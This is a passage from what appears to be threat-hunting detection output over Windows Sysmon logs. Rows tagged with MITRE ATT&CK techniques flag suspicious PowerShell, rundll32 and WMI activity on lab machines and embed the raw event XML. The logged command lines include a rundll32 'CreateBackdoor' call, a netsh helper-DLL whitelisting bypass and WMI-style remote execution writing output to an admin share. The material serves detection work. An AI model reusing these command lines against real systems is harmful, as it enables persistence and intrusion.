<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
</TimeCreated>
<EventRecordID>578497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
<Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ProcessId"">7280</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
<Data Name=""LogonId"">0x76073</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ParentProcessId"">2532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
</TimeCreated>
<EventRecordID>578497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
<Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ProcessId"">7280</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
<Data Name=""LogonId"">0x76073</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ParentProcessId"">2532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-15T15:00:15.695416Z"">
</TimeCreated>
<EventRecordID>589974</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3524"" ThreadID=""4288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-15 15:00:14.467</Data>
<Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
<Data Name=""ProcessId"">6976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">50007</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
<Data Name=""DestinationPort"">135</Data>
<Data Name=""DestinationPortName"">epmap</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.485479Z"">
</TimeCreated>
<EventRecordID>4947</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.336</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001051388B00</Data>
<Data Name=""ProcessId"">3824</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh.exe add helper AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
